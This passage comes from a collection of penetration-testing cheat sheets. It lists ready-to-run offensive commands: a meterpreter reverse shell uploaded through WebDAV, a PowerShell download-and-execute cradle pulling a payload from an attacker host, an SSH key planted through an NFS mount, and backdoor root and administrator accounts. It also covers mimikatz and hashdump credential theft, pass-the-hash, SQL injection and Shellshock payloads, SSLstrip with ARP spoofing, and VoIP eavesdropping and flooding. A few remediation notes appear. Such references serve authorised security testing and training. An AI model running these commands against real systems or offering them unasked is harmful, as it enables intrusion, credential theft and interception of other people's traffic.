128 | enable - Change to privileged mode to view configs 129 | config terminal/config t - Change to global config mode to modify 130 | 131 | #show version - Gives you the router's configuration register (Firmware) 132 | #show running-config - Shows the router, switch, or firewall's current configuration 133 | #show ip route - show the router's routing table 134 | #show tech-support - Dump config but obscure passwords 135 | 136 | -------------------------------------------------------------------------- Remote Information Services 137 | 138 | [+] DNS 139 | Zone Transfer - host -l securitymuppets.com 192.168.100.2 140 | Metasploit Auxiliarys: 141 | auxiliary/gather/enum_dns 142 | use auxiliary/gather/dns... 143 | 144 | [+] Finger - Enumerate Users 145 | finger @192.168.0.1 146 | finger -l -p user@ip-address 147 | auxiliary/scanner/finger/finger_users 148 | 149 | [+] NTP 150 | Metasploit Auxiliarys 151 | 152 | [+] SNMP 153 | onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 154 | Metasploit Module snmp_enum 155 | snmpcheck -t snmpservice 156 | 157 | [+] rservices 158 | rwho 192.168.0.1 159 | rlogin -l root 192.168.0.17 160 | 161 | [+] RPC Services 162 | rpcinfo -p 163 | Endpoint_mapper metasploit 164 | 165 | -------------------------------------------------------------------------- Web Services 166 | 167 | [+] WebDAV 168 | Metasploit Auxiliarys 169 | Upload shell to Vulnerable WebDAV directory: 170 | msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=4444 R | msfencode -t asp -o shell.asp 171 | cadaver http://192.168.0.60/ 172 | put shell.asp shell.txt 173 | copy shell.txt shell.asp;.txt 174 | Start reverse handler - browse to http://192.168.0.60/shell.asp;.txt 175 | 176 | 177 | -------------------------------------------------------------------------- Windows Networking Services 178 | 179 | [+] Get Domain Information: 180 | nltest /DCLIST:DomainName 181 | nltest /DCNAME:DomainName 182 | nltest /DSGETDC:DomainName 183 | 184 | [+] Netbios Enumeration 185 | nbtscan -r 192.168.0.1-100 186 | nbtscan -f hostfiles.txt 187 | 188 | [+] enum4linux 189 | 190 | [+] RID Cycling 191 | use auxiliary/scanner/smb/smb_lookupsid 192 | 193 | [+] Null Session in Windows 194 | net use \\192.168.0.1\IPC$ "" /u:"" 195 | 196 | [+] Null Session in Linux 197 | smbclient -L //192.168.99.131 198 | 199 | -------------------------------------------------------------------------- Accessing Email Services 200 | 201 | Metasploit Auxiliarys 202 | 203 | [+] SMTP Open Relay Commands 204 | 205 | [-] ncat -C 86.54.23.178 25 206 | [-] HELO mail.co.uk 207 | [-] MAIL FROM: 208 | [-] RCPT TO: 209 | [-] DATA 210 | Test Email - some malicious stuff! 211 | 212 | -------------------------------------------------------------------------- VPN Testing 213 | 214 | [+] ike-scan 215 | ike-scan 192.168.207.134 216 | sudo ike-scan -A 192.168.207.134 217 | sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key 218 | 219 | [+] pskcrack 220 | psk-crack -b 5 192-168-207-134key 221 | psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key 222 | psk-crack -d /path/to/dictionary 192-168-207-134key 223 | 224 | -------------------------------------------------------------------------- Unix RPC 225 | 226 | [+] NFS Mounts 227 | 228 | Metasploit : auxiliary/scanner/nfs/nfsmount 229 | 230 | rpcinfo -p 192.168.0.10 231 | 232 | showmount -e 192.168.0.10 233 | mount 192.168.0.10:/secret /mnt/share/ 234 | 235 | ssh-keygen 236 | mkdir /tmp/r00t 237 | mount -t nfs 192.168.0.10:/secret /mnt/share/ 238 | cat ~/.ssh/id_rsa.pub >> /mnt/share/root/.ssh/authorized_keys 239 | umount /mnt/share 240 | ssh root@192.168.0.10 241 | 242 | -------------------------------------------------------------------------- Post Exploitation 243 | 244 | [+] Command prompt access on Windows Host 245 | 246 | pth-winexe -U Administrator% // cmd.exe 247 | 248 | [+] Add Linux User 249 | /usr/sbin/useradd –g 0 –u 0 –o user 250 | echo user:password | /usr/sbin/chpasswd 251 | 252 | [+] Add Windows User 253 | net user username password@1 /add 254 | net localgroup administrators username /add 255 | 256 | [+] Solaris Commands 257 | useradd -o user 258 | passwd user 259 | usermod -R root user 260 | 261 | [+] Dump remote SAM: 262 | PwDump.exe -u localadmin 192.168.0.1 263 | 264 | [+] Mimikatz 265 | mimikatz # privilege::debug 266 | mimikatz # sekurlsa::logonPasswords full 267 | 268 | [+] Meterpreter 269 | meterpreter> run winenum 270 | meterpreter> use post/windows/gather/smart_hashdump 271 | 272 | meterpreter > use incognito 273 | meterpreter > list_tokens -u 274 | meterpreter > impersonate_token TVM\domainadmin 275 | meterpreter > add_user hacker password1 -h 192.168.0.10 276 | meterpreter > add_group_user "Domain Admins" hacker -h 192.168.0.10 277 | 278 | meterpreter > load mimikatz 279 | meterpreter > wdigest 280 | meterpreter > getWdigestPasswords 281 | Migrate if does not work! 282 | 283 | [+] Kitrap0d 284 | Download vdmallowed.exe and vdmexploit.dll to victim 285 | Run vdmallowed.exe to execute system shell 286 | 287 | [+] Windows Information 288 | On Windows: 289 | ipconfig /all 290 | systeminfo 291 | net localgroup administrators 292 | net view 293 | net view /domain 294 | 295 | [+] SSH Tunnelling 296 | Remote forward port 222 297 | ssh -R 127.0.0.1:4444:10.1.1.251:222 -p 443 root@192.168.10.118 298 | 299 | -------------------------------------------------------------------------- Metasploit 300 | 301 | ----------------- [+] Metasploit Pivot 302 | 303 | Compromise 1st machine 304 | 305 | # meterpreter> run arp_scanner -r 10.10.10.0/24 306 | route add 10.10.10.10 255.255.255.248 307 | use auxiliary/scanner/portscan/tcp 308 | use bind shell 309 | 310 | or run autoroute: 311 | 312 | # meterpreter > ipconfig 313 | # meterpreter > run autoroute -s 10.1.13.0/24 314 | # meterpreter > getsystem 315 | # meterpreter > run hashdump 316 | # use auxiliary/scanner/portscan/tcp 317 | # msf auxiliary(tcp) > use exploit/windows/smb/psexec 318 | 319 | or port forwarding: 320 | # meterpreter > run autoroute -s 10.1.13.0/24 321 | # use auxiliary/scanner/portscan/tcp 322 | # meterpreter > portfwd add -l -p -r 323 | 324 | or socks proxy: 325 | route add 10.10.10.10 255.255.255.248 326 | use auxiliary/server/socks4a 327 | Add proxy to /etc/proxychains.conf 328 | proxychains nmap -sT -T4 -Pn 10.10.10.50 329 | setg socks4:127.0.0.1:1080 330 | 331 | ----------------- [+] Pass the hash 332 | 333 | If NTML only: 334 | 00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c 335 | 336 | STATUS_ACCESS_DENIED (Command=117 WordCount=0): 337 | This can be remedied by navigating to the registry key, "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters" on the target systems and setting the value of "RequireSecuritySignature" to "0" 338 | 339 | Run hashdump on the first compromised machine: 340 | run post/windows/gather/hashdump 341 | 342 | Run Psexec module and specify the hash: 343 | use exploit/windows/smb/psexec 344 | 345 | ----------------- [+] Enable RDP: 346 | meterpreter > run getgui -u hacker -p s3cr3t 347 | Clean up command: meterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20110112.2448.rc 348 | 349 | ----------------- [+] AutoRunScript 350 | Automatically run scripts before exploiation: 351 | set AutoRunScript "migrate explorer.exe" 352 | 353 | [+] Set up SOCKS proxy in MSF 354 | 355 | [+] Run a post module against all sessions 356 | resource /usr/share/metasploit-framework/scripts/resource/run_all_post.rc 357 | 358 | [+] Find local subnets 'Whilst in meterpreter shell' 359 | meterpreter > run get_local_subnets 360 | 361 | # Add the correct Local host and Local port parameters 362 | echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.7 -Lport 443 -Force" >> /var/www/payload 363 | 364 | # Set up psexec module on metasploit 365 | auxiliary/admin/smb/psexec_command 366 | set command powershell -Exec Bypass -NoL -NoProfile -Command IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.0.9/payload\') 367 | 368 | # Start reverse Handler to catch the reverse connection 369 | Module options (exploit/multi/handler): 370 | Payload options (windows/meterpreter/reverse_https): 371 | 372 | Name Current Setting Required Description 373 | ---- --------------- -------- ----------- 374 | EXITFUNC process yes Exit technique: seh, thread, process, none 375 | LHOST 192.168.0.9 yes The local listener hostname 376 | LPORT 443 yes The local listener port 377 | 378 | # Show evasion module options 379 | show evasion 380 | 381 | [+] Metasploit Shellcode 382 | msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' 383 | 384 | -------------------------------------------------------------------------- File Transfer Services 385 | 386 | [+] Start TFTPD Server 387 | atftpd --daemon --port 69 /tmp 388 | 389 | [+] Connect to TFTP Server 390 | tftp 192.168.0.10 391 | put / get files 392 | 393 | -------------------------------------------------------------------------- LDAP Querying 394 | 395 | Tools: 396 | ldapsearch 397 | LDAPExplorertool2 398 | 399 | Anonymous Bind: 400 | ldapsearch -h ldaphostname -p 389 -x -b "dc=domain,dc=com" 401 | 402 | Authenticated: 403 | ldapsearch -h 192.168.0.60 -p 389 -x -D "CN=Administrator, CN=User, DC=, DC=com" -b "DC=, DC=com" -W 404 | 405 | Useful Links: 406 | http://www.lanmaster53.com/2013/05/public-facing-ldap-enumeration/ 407 | http://blogs.splunk.com/2009/07/30/ldapsearch-is-your-friend/ 408 | 409 | 410 | -------------------------------------------------------------------------- Password Attacks 411 | 412 | [+] Bruteforcing http password prompts 413 | medusa -h -u -P -M http -n -m DIR:/ -T 30 414 | -------------------------------------------------------------------------------- /Cheatsheet_Pyinstaller.txt: -------------------------------------------------------------------------------- 1 | python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py 2 | 3 | [+] Generate the .spec file. 4 | [+] Windows: (You want a single EXE file with your data in it, hence --onefile). 5 | 6 | python pyinstaller.py --onefile your_main_file.py 7 | 8 | [+] Rebuild your package. 9 | 10 | python pyinstaller.py your_main_file.spec 11 | 12 | [+]Look for your .exe or your .app bundle in the dist directory. -------------------------------------------------------------------------------- /Cheatsheet_Python.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jivoi/Cheatsheets/9bc195d4cc05728c4ee29312124ac57ed54bb160/Cheatsheet_Python.pdf -------------------------------------------------------------------------------- /Cheatsheet_Remediations.txt: -------------------------------------------------------------------------------- 1 | [+] Weak SSH Ciphers 2 | 3 | sudo nano /etc/ssh/sshd_config 4 | 5 | Add the following lines: 6 | 7 | Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour 8 | MACs hmac-sha1,hmac-ripemd160 9 | 10 | Restart SSH 11 | 12 | 13 | [+] Unquoted Service Paths 14 | 15 | Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services 16 | Find the service in question and simply add " " either side of the ImagePath string. 17 | 18 | Check permissions: 19 | C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe" -------------------------------------------------------------------------------- /Cheatsheet_SMBCapture.txt: -------------------------------------------------------------------------------- 1 | [+] NBNS Spoof / Capture 2 | 3 | [>] NBNS Spoof 4 | msf > use auxiliary/spoof/nbns/nbns_response 5 | msf auxiliary(nbns_response) > show options 6 | msf auxiliary(nbns_response) > set INTERFACE eth0 7 | msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10 8 | msf auxiliary(nbns_response) > run 9 | 10 | [>] SMB Capture 11 | 12 | msf > use auxiliary/server/capture/smb 13 | msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb 14 | msf auxiliary(smb) > run 15 | 16 | [>] HTTP NTML Capture 17 | 18 | msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm 19 | msf auxiliary(smb) > set JOHNPWFILE /tmp/john_http 20 | msf auxiliary(smb) > set SRVPORT 80 21 | msf auxiliary(smb) > set URIPATH / 22 | msf auxiliary(smb) > run 23 | 24 | 25 | Fix: 26 | http://www.leonteale.co.uk/netbios-nbns-spoofing/ 27 | 28 | Solution 29 | The solution to this is to disable Netbios from broadcasting. The setting for this is in, what i hope, a very familiar place thaet you might not have really paid attention too before. 30 | netbios 31 | 32 | Netbios, according to Microsoft, is no longer needed as of Windows 2000. 33 | However, there are a few side effects. 34 | One of the unexpected consequences of disabling Netbios completely on your network is how this affects trusts between forests. Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest so users in one forest could access resources in the trusting domain of the other forest. Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trusts called forest trusts that allow users in any domain of one forest access resources in any domain of the other forest. Amazingly, NetBIOS is actually still used in the trust creation process, even though Microsoft has officially “deprecated” NetBIOS in versions of Windows from 2000 on. So if you disable Netbios on your domain controllers, you won’t be able to establish a forest trust between two Windows Server 2003 forests. 35 | But Windows 2003 is pretty old, since as of writing we are generally on Windows 2012 now. So if you would like to disable Netbios on your servers yet will be effected by the side effect for Forest trusts then ideally you should upgrade and keep up with the times anyway. alternatively, you can get away with, at the very least, disabling Netbios on your workstations. 36 | See below for step by step instructions on disabling Netbios on workstations: 37 | 38 | Windows XP, Windows Server 2003, and Windows 2000 39 | On the desktop, right-click My Network Places, and then click Properties. 40 | Right-click Local Area Connection, and then click Properties 41 | In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), clickAdvanced, and then click the WINS tab.Note In Windows XP and in Windows Server 2003, you must double-click Internet Protocol (TCP/IP) in the This connection uses the following items list. 42 | Click Use NetBIOS setting from the DHCP server, and then click OK three times. 43 | 44 | For Windows Vista 45 | On the desktop, right-click Network, and then click Properties. 46 | Under Tasks, click Manage network connections. 47 | Right-click Local Area Connection, and then click Properties 48 | In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab. 49 | Click Use NetBIOS setting from the DHCP server, and then click OK three times. 50 | 51 | For Windows 7 52 | Click Start, and then click Control Panel. 53 | Under Network and Internet, click View network status and tasks. 54 | Click Change adapter settings. 55 | Right-click Local Area Connection, and then click Properties. 56 | In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab. 57 | Click Use NetBIOS setting from the DHCP server, and then click OK three times. -------------------------------------------------------------------------------- /Cheatsheet_SMBEnumeration.txt: -------------------------------------------------------------------------------- 1 | SMB Enumeration Techniques using Backtrack: 2 | 3 | 1. NBTSCAN 4 | 5 | root@bt:~# nbtscan -r 10.0.2.0/24 6 | Doing NBT name scan for addresses from 10.0.2.0/24 7 | 8 | IP address NetBIOS Name Server User MAC address 9 | ------------------------------------------------------------------------------ 10 | 10.0.2.0 Sendto failed: Permission denied 11 | 10.0.2.10 12 | 10.0.2.15 METASPLOITABLE METASPLOITABLE 00-00-00-00-00-00 13 | 10.0.2.18 TEST01 TEST01 00-11-21-22-1d-4d 14 | 10.0.2.45 TEST04 TEST04 00-12-d2-34-11-55 15 | 16 | 2. NMAP 17 | 18 | nmap -p 1-65535 -T4 -O -A -v 10.0.2.15 19 | 20 | 3. SMBCLIENT 21 | 22 | root@bt:~# smbclient -L=10.0.2.15 23 | 24 | Null Sessions 25 | 26 | root@bt:~# smbclient \\\\10.0.2.15\\tmp 27 | Enter root's password: 28 | Anonymous login successful 29 | 30 | 31 | SMB Enumeration Techniques using Windows Tools: 32 | 33 | 1. NetBIOS Enumerator (nbtenum) 34 | 35 | http://nbtenum.sourceforge.net/ -------------------------------------------------------------------------------- /Cheatsheet_SMTPOpenRelay.txt: -------------------------------------------------------------------------------- 1 | [+] SMTP Open Relay Commands 2 | 3 | [-] ncat -C 86.54.23.178 25 4 | [-] HELO mail.co.uk 5 | [-] MAIL FROM: 6 | [-] RCPT TO: 7 | [-] DATA 8 | Test Email -------------------------------------------------------------------------------- /Cheatsheet_SQLInjection.txt: -------------------------------------------------------------------------------- 1 | [+] Union Based SQL Injection 2 | 3 | ' or 1=1# 4 | 5 | 1' ORDER BY 10# 6 | 7 | 1' UNION SELECT version(),2# 8 | 9 | 1' UNION SELECT version(),database()# 10 | 11 | 1' UNION SELECT version(),user()# 12 | 13 | 1' UNION ALL SELECT table_name,2 from information_schema.tables# 14 | 15 | 1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"# 16 | 17 | 1' UNION ALL SELECT concat(user,char(58),password),2 from users# 18 | 19 | 20 | sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs -------------------------------------------------------------------------------- /Cheatsheet_SSLStrip.txt: -------------------------------------------------------------------------------- 1 | 1) Flip your machine into forwarding mode (as root): 2 | echo "1" > /proc/sys/net/ipv4/ip_forward 3 | 4 | 2) Setup iptables to intercept HTTP requests (as root): 5 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 6 | 7 | 3) sslstip.py -l 8080 -f lock.ico 8 | 9 | 4) Run arpspoof to redirect traffic to your machine (as root): 10 | arpspoof -i -t -------------------------------------------------------------------------------- /Cheatsheet_Solaris.txt: -------------------------------------------------------------------------------- 1 | [+] Solaris vulnerabilities: 2 | 3 | Solaris 7: 4 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 5 | **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client 6 | sendmail_exec LPD - line printer daemon buffer overflow - allows root 7 | heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root 8 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root 9 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 10 | 11 | Solaris 8: 12 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 13 | **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client 14 | sendmail_exec LPD - line printer daemon buffer overflow - allows root 15 | heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root 16 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 17 | no exploit - sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. 18 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 19 | 20 | solaris 9: 21 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 22 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 23 | sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. 24 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 25 | 26 | Solaris 10: 27 | fuser TELNET - authentication bypass through -f command - can be manually exploited 28 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 29 | 30 | Solaris 11: 31 | fuser TELNET - authentication bypass through -f command - can be manually exploited 32 | 33 | [+] Adding solaris user: 34 | 35 | useradd -u 0 -o pentestuser 36 | passwd -d pentestuser 37 | 38 | [+] In addition, familiarise yourself with rpcinfo, nfsshell, showmount, 'mount -t nfs'. -------------------------------------------------------------------------------- /Cheatsheet_Tools.txt: -------------------------------------------------------------------------------- 1 | Browser Addons 2 | -------------- 3 | 4 | - Chrome: 5 | 6 | Recx Security Analyser 7 | Wappalyzer 8 | 9 | - Firefox/Iceweasel: 10 | 11 | Web Developer 12 | Tamper Data 13 | FoxyProxy Standard 14 | User Agent Switcher 15 | PassiveRecon 16 | Wappalyzer 17 | Firebug 18 | HackBar -------------------------------------------------------------------------------- /Cheatsheet_UsefulCommands.txt: -------------------------------------------------------------------------------- 1 | Useful commands 2 | --------------- 3 | 4 | [+] Remove text using sed 5 | 6 | cat SSL_Hosts.txt | sed -r 's/\ttcp\t/:/g' 7 | 8 | [+] Port forwarding using NCAT 9 | 10 | ncat -lvkp 12345 -c "ncat --ssl 192.168.0.1 443" 11 | 12 | [+] Windows 7 or later, build port relay 13 | 14 | C:\> netsh interface portproxy add v4tov4 listenport= listenaddress=0.0.0.0 connectport= connectaddress= 15 | 16 | [+] Grab HTTP Headers 17 | 18 | curl -LIN 19 | 20 | [+] Quickly generate an MD5 hash for a text string using OpenSSL 21 | 22 | echo -n 'text to be encrypted' | openssl md5 23 | 24 | [+] Shutdown a Windows machine from Linux 25 | 26 | net rpc shutdown -I ipAddressOfWindowsPC -U username%password 27 | 28 | [+] Conficker Detection with NMAP 29 | 30 | nmap -PN -d -p445 --script=smb-check-vulns --script-args=safe=1 IP-RANGES 31 | 32 | [+] Determine if a port is open with bash 33 | 34 | (: /dev/null && echo "OPEN" || echo "CLOSED" -------------------------------------------------------------------------------- /Cheatsheet_VOIP.txt: -------------------------------------------------------------------------------- 1 | VOIP (SIP) Cheatsheet 2 | -------------------------------- 3 | 4 | SIP usually uses ports 5060 TCP or UDP for unencrypted signaling or 5061 for encrypted transportation using TLS. 5 | 6 | SIP is an ASCII based protocol which has some similar elements like in the HTTP protocol by using a Request/Response model. Much like an HTTP request from a browser a SIP client request is made using a SIP URI a user agent and a method/request. SIP uses e-mail like addresses format: user/phone@domain/ip A typical SIP URI looks like: 7 | 8 | sip:205@192.168.1.100, sip:username@pbx.com , sip:205@192.168.1.100:5060 9 | 10 | 11 | [+] SIP Requests / Methods 12 | 13 | Request Description 14 | INVITE Used to invite and account to participate in a call session. 15 | ACK Acknowledge an INVITE request. 16 | CANCEL Cancel a pending request. 17 | REGISTER Register user with a SIP server. 18 | OPTIONS Lists information about the capabilities of a caller. 19 | BYE Terminates a session between two users in a call. 20 | REFER Indicates that the recipient(identified by the Request URI) should contact a third party using the contact information provided in the request. 21 | SUBSCRIBE The SUBSCRIBE method is used to request current state and state updates from a remote node. 22 | NOTIFY The NOTIFY method is used to notify a SIP node that an event which has been requested by an earlier SUBSCRIBE method has occurred. 23 | 24 | 25 | [+] An Example SIP “INVITE” Request: 26 | 27 | INVITE sip:201@192.168.1.104 SIP/2.0 28 | Via: SIP/2.0/UDP 192.168.1.102;rport;branch=z9hG4bKvbxaoqar 29 | Max-Forwards: 70 30 | 31 | To: 32 | From: "NightRanger" ;tag=eihgg 33 | Call-ID: hfxsabthoymshub@backtrack 34 | CSeq: 649 INVITE 35 | Contact: 36 | Content-Type: application/sdp 37 | 38 | Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,PRACK,REFER,NOTIFY,SUBSCRIBE,INFO,MESSAGE 39 | Supported: replaces,norefersub,100rel 40 | User-Agent: Twinkle/1.2 41 | 42 | Content-Length: 310 43 | 44 | 45 | [+] SIP Responses 46 | 47 | Response Description 48 | 1xx Informational responses, Request received and being 49 | 2xx Successful responses The action was successfully received, understood, and accepted. 50 | 3xx Redirection responses 51 | 4xx Request failure responses The request contains bad syntax or cannot be fulfilled at the server. 52 | 5xx Server failure responses The server failed to fulfill an apparently valid request. 53 | 6xx Global failure responses The request cannot be fulfilled at any server. 54 | 55 | 56 | [+] SIP Call Between 2 Phones Example 57 | 58 | The calling phone sends an invite. 59 | The called phone sends back a response of 100 (Trying). 60 | The called phone then starts to ring and sends a response of 180 (Ringing). 61 | When the caller picks up the phone the called phone sends a response of 200 (OK). 62 | The calling phone sends an ACK response. 63 | Conversation begins via RTP. 64 | When the caller hangs up the phone a BYE request is sent. 65 | The calling phone responds with 200 (OK). 66 | 67 | 68 | Information Gathering 69 | --------------------- 70 | 71 | [+] SMAP - Simple scanner for SIP enabled devices. 72 | 73 | ./smap 192.168.1.104 74 | ./smap 192.168.1.130/24 75 | ./smap -O 192.168.1.104 76 | ./smap -l 192.168.1.104 77 | ./smap -d 192.168.1.104 78 | 79 | [+] SIPSAK - Testing SIP enabled applications and devices using the OPTION request method only. 80 | 81 | sipsak -vv -s sip:192.168.1.221 82 | 83 | [+] SIPScan - Simple scanner for sip enabled hosts. 84 | 85 | ./sip-scan -i eth0 192.168.1.1-254 86 | 87 | [+] SVMAP (SIPVicious) 88 | 89 | ./svmap.py 192.168.1.1-254 90 | ./svmap.py 192.168.1.1-254 --fp 91 | 92 | 93 | Extensions Enumeration 94 | ---------------------- 95 | 96 | [+] Svwar - Enumerate extensions by using a range of extensions or using a dictionary file. 97 | 98 | ./svwar.py -e100-400 192.168.1.104 99 | ./svwar.py -e100-400 192.168.1.104 -m INVITE -v 100 | 101 | [+] Enumiax - Enumerate Asterisk Exchange protocol usernames. 102 | 103 | ./enumiax -v -m3 -M3 192.168.1.104 104 | ./enumiax -d dict -v 192.168.1.104 105 | 106 | 107 | Monitoring Traffic and Eavesdropping Phone calls 108 | ------------------------------------------------ 109 | 110 | Capturing SIP authentication (we will later discuss this topic in the attacking authentication section). 111 | Eavesdropping users phone calls. 112 | 113 | [+] Arp Poisoning using Arpspoof 114 | 115 | echo 1 > /proc/sys/net/ipv4/ip_forward 116 | arpspoof –t victim gateway 117 | arpspoof –t gateway victim 118 | 119 | Capturing traffic and Eavesdropping using Wireshark 120 | 121 | Capture Filter: not broadcast and not multicast and host 122 | 123 | Wireshark: Decode captured VoIP calls data into playable audio format. This feature is under the Statistics -> VoIP Calls menu. 124 | 125 | 126 | [+] Capturing SIP Authentication using SIPDump 127 | SIPDump is a part of the SIPCrack tools suite, it allows performing a live capture of SIP authentication digest response or it can dump a previously captured sessions from a PCAP file. 128 | 129 | ./sipdump -i eth0 130 | ./sipdump -i eth0 auth.txt 131 | ./sipdump -p /root/registration.pcap auth.txt 132 | 133 | 134 | [+] Cracking SIP Digest response hashes 135 | 136 | ./sipcrack -w sipass.txt auth.txt 137 | 138 | 139 | [+] Brute forcing SIP Accounts 140 | 141 | ./svcrack.py -u200 -d wordlist.txt 192.168.1.104 142 | ./svcrack.py -u200 -r100000-999999 192.168.1.104 143 | 144 | 145 | VLAN Hopping 146 | ------------ 147 | 148 | modprobe 8021q 149 | 150 | [+] VoIP Hopper 151 | 152 | ./voiphopper -i eth0 -c 0 153 | ./voiphopper -i eth0 -v 20 154 | 155 | 156 | Denial Of Service 157 | ----------------- 158 | 159 | [+] Inviteflood - This tool can be used to flood a target with INVITE requests it can be used to target sip gateways/proxies and sip phones. 160 | 161 | ./inviteflood eth0 162 | 163 | 164 | Attacking VoIP Using Metasploit 165 | ------------------------------- 166 | 167 | [+] Scanning SIP Enabled Devices 168 | use auxiliary/scanner/sip/options 169 | 170 | [+] Enumerating SIP extensions / Usernames 171 | use scanner/sip/enumerator 172 | set RHOSTS 192.168.1.104 173 | set MINEXT 100 174 | set MAXEXT 500 175 | set PADLEN 3 176 | 177 | [+] Spoofing Caller ID auxiliary 178 | use voip/sip_invite_spoof -------------------------------------------------------------------------------- /Cheatsheet_Vlans.txt: -------------------------------------------------------------------------------- 1 | Configure an Ethernet interface as a VLAN trunk 2 | --------------------------------------------------- 3 | 4 | Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are 192.168.2.1/24 on VLAN 2 and 192.168.3.1/24 on VLAN 3. 5 | 6 | [+] First install the vlan package if it is not already present: 7 | 8 | apt-get install vlan 9 | 10 | [+] Turn off network-manager 11 | 12 | sudo stop network-manager 13 | 14 | [+] Configuring interfaces 15 | 16 | vconfig add eth0 (you may get a warning message on the first one) 17 | example: vconfig add eth0 101 18 | 19 | ifconfig eth0. /24 up 20 | example: ifconfig eth0.101 192.168.1.10/24 up 21 | 22 | ifconfig eth0. 23 | 24 | Note: If any issues run, ifconfig eth0 0.0.0.0 up 25 | Note: Specify interface with nmap scanning (nmap -e eth0.101) 26 | Note: You will probably need to add individual routes for each vlan if you want to communicate between vlans, don't rely on your default gateway. (route add) 27 | 28 | [+] Remove Configuration 29 | vconfig rem eth0.101 30 | -------------------------------------------------------------------------------- /Cheatsheet_VulnVerify.txt: -------------------------------------------------------------------------------- 1 | Verify Various Vulnerabilities 2 | ------------------------------ 3 | 4 | [+] IPMI Cipher Suite Zero Authentication Bypass: 5 | http://www.tenable.com/plugins/index.php?view=single&id=68931 6 | 7 | Tools required: 8 | ipmitool 9 | freeipmi-tools 10 | 11 | ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list 12 | 13 | # Specifying Cipher Suite Zero 14 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword user list 15 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis status 16 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help 17 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell 18 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor 19 | 20 | 21 | [+] Bash Remote Code Execution (Shellshock) 22 | http://www.tenable.com/plugins/index.php?view=single&id=77823 23 | 24 | x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt 25 | x: () { :;}; echo "Hacked" > /var/www/hacked.html 26 | 27 | 28 | [+] DNS Server Cache Snooping Remote Information Disclosure 29 | http://www.tenable.com/plugins/index.php?view=single&id=12217 30 | 31 | Nmap Script: dns-cache-snoop 32 | http://nmap.org/nsedoc/scripts/dns-cache-snoop.html 33 | 34 | nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' 35 | 36 | 37 | [+] IP Forwarding Enabled 38 | http://www.tenable.com/plugins/index.php?view=single&id=50686 39 | 40 | Nmap Script: ip-forwarding 41 | http://nmap.org/nsedoc/scripts/ip-forwarding.html 42 | 43 | sudo nmap -sn --script ip-forwarding --script-args='target=www.example.com' 44 | 45 | Alternatives: 46 | - Set VM's default gateway as the victim IP address and attempt to route elsewhere. 47 | - http://pentestmonkey.net/tools/gateway-finder 48 | -------------------------------------------------------------------------------- /Cheatsheet_WindowsCommandLine.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jivoi/Cheatsheets/9bc195d4cc05728c4ee29312124ac57ed54bb160/Cheatsheet_WindowsCommandLine.pdf -------------------------------------------------------------------------------- /Cheatsheet_WirelessTesting.txt: -------------------------------------------------------------------------------- 1 | WPA2 PSK attack with aircrack-ng suite. 2 | --------------------------------------- 3 | 4 | ifconfig wlan1 # check wireless IFace 5 | sudo airmon-ng check kill # kill issue causing processes 